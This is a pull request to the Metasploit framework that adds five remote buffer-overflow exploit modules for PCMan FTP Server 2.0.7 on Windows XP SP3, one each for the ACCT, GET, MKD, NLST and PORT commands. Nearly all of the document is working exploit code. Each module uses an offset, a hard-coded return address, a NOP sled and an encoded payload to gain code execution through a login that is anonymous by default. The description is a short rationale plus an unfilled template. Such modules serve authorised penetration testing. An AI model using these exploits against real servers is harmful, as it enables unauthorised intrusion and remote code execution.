### PR TITLE
Added PCMAN Buffer overflow modules

### DIFF
--- a/modules/exploits/windows/ftp/pcman_acct.rb
+++ b/modules/exploits/windows/ftp/pcman_acct.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - ACCT Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the ACCT command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'Cybernetic',      # Initial Discovery -- https://www.exploit-db.com/exploits/40704/
+            'Ye Yint Min Thu Htut'   # msf Module -- @yeyint_mth @yehg
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   ''],
+          [ 'OSVDB',   '']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0A\x0D",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x7E6B31C7, # shell32.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Nov 03 2016',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Creating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(30)
+    sploit << payload.encoded
+
+    send_cmd( ["ACCT", sploit], false )
+    disconnect
+  end
+
+end

--- a/modules/exploits/windows/ftp/pcman_get.rb
+++ b/modules/exploits/windows/ftp/pcman_get.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - GET Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the GET command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'Koby',      # Initial Discovery -- https://www.exploit-db.com/exploits/38003/
+            'Ye Yint Min Thu Htut'   # msf Module -- @yeyint_mth @yehg
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   ''],
+          [ 'OSVDB',   '']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x7c9d30eb, # shell32.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Aug 28 2015',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Creating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(15)
+    sploit << payload.encoded
+
+    send_cmd( ["GET ", sploit], false )
+    disconnect
+  end
+
+end

--- a/modules/exploits/windows/ftp/pcman_mkd.rb
+++ b/modules/exploits/windows/ftp/pcman_mkd.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - MKD Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the MKD command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'R-73eN',      # Initial Discovery -- https://www.exploit-db.com/exploits/36078/
+            'Ye Yint Min Thu Htut'   # msf Module -- @yeyint_mth @yehg
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   ''],
+          [ 'OSVDB',   '']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0A\x0D",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x7CA58265, # shell32.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Feb 14 2015',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Creating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(10)
+    sploit << payload.encoded
+
+    send_cmd( ["mkd", sploit], false )
+    disconnect
+  end
+
+end

--- a/modules/exploits/windows/ftp/pcman_nlst.rb
+++ b/modules/exploits/windows/ftp/pcman_nlst.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - NLST Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the NLST command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'Karri93',      # Initial Discovery -- https://www.exploit-db.com/exploits/40712/
+            'Ye Yint Min Thu Htut'   # msf Module -- @yeyint_mth @yehg
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   ''],
+          [ 'OSVDB',   '']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0A\x0D",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x77f11d2f, # GDI32.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Nov 04 2016',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Creating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(30)
+    sploit << payload.encoded
+
+    send_cmd( ["NLST", sploit], false )
+    disconnect
+  end
+
+end

--- a/modules/exploits/windows/ftp/pcman_port.rb
+++ b/modules/exploits/windows/ftp/pcman_port.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PCMAN FTP Server Buffer Overflow - PORT Command',
+      'Description'    => %q{
+          This module exploits a buffer overflow vulnerability found in the PORT command of the
+          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
+          credientials are enabled.
+      },
+      'Author'         =>
+          [
+            'Pablo Gonzalez',      # Initial Discovery -- https://www.exploit-db.com/exploits/40714//
+            'Ye Yint Min Thu Htut'   # msf Module -- @yeyint_mth @yehg
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB',   ''],
+          [ 'OSVDB',   '']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'   => 1000,
+          'BadChars'  => "\x00\x0A\x0D",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x7e3c56f7, # User32.dll
+              'Offset' => 2007
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Nov 04 2016',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    connect_login
+    disconnect
+
+    if /220 PCMan's FTP Server 2\.0/ === banner
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    connect_login
+
+    print_status('Creating payload...')
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << [target.ret].pack('V')
+    sploit << make_nops(16)
+    sploit << payload.encoded
+
+    send_cmd( ["PORT", sploit], false )
+    disconnect
+  end
+
+end


### PR DESCRIPTION
When i explored PCMan FTP exploit modules, only prompt for PUT and STOR command overflow modules. 
So I am porting for GET, NLST, ACCT, MKD, PORT command from each initial exploit.

Full Info: https://github.com/yeyintminthuhtut/metasploit-modules/blob/master/README.md


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

